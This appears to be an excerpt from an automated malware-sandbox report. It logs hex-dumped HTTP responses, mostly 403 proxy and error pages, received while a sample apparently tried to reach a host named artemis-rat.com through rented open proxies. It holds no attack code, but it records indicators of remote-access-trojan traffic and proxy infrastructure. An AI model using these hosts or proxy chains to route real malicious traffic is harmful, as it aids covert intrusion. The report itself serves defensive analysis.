20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><t
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:16 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:16 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.3.8Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/htmlContent-Length: 3556X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
